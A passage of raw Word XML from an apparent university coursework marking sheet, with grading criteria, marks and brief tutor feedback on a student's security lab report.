          <w:p w14:paraId="2378E2E6" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="totalKUS"/>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FA55A9B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="markKUS"/>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="0522A2E0" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3ABDC8D1" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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1DCDCEE6" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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B870047" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="0731207C" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="1CCF2140" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513B5EBA" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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6DADF489" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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58B2C59" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="79BBEC0E" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02B7F9D6" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="9" w:name="feedbackANA"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>The lab exercises were excellently documented and analysed (still went overboard with your discussion). You have relate on how these can aid or assist organisation to be proactive against vulnerabilities, threats and attacks. Overall, excellent job.  (Grade mark: 100.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66F8307A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="totalANA"/>
            <w:bookmarkEnd w:id="10"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang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5A6898D4" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="11" w:name="markANA"/>
            <w:bookmarkEnd w:id="11"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="291553CF" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="395BDCA2" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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142BFCF5" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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6940F21" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="3EBCD471" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="323CF88D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Practical Application and Deployment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68181695" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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F273867" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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EABC54D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="31AF4CFA" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D2ED91A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="feedbackPAD"/>
            <w:bookmarkEnd w:id="12"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="394BA36C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="13" w:name="totalPAD"/>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25C92C25" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="markPAD"/>
            <w:bookmarkEnd w:id="14"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="4962B57B" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D28DBE0" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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1387FE0A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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3297B0E" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="257AF3C7" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="6AD91103" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Skills for Professional Practice</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246E9E6C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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2C0524D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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7222F3C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="449EF5A9" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78E6F11B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="15" w:name="feedbackSPP"/>
            <w:bookmarkEnd w:id="15"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Can communicate with an exceptionally high level of professionalism.   (Grade mark: 100.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4EBC9484" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="totalSPP"/>
            <w:bookmarkEnd w:id="16"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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339A6199" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="17" w:name="markSPP"/>
            <w:bookmarkEnd w:id="17"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="6AA8A32D" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21432E63" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29574536" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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406F9C4" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6288E06B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:ind w:left="284" w:right="533"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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2010EA" w:rsidRPr="002010EA" w14:paraId="0FE343C2" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3816585D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Assignment Mark </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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C48CC6A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Late Submission Penalties (tick if appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
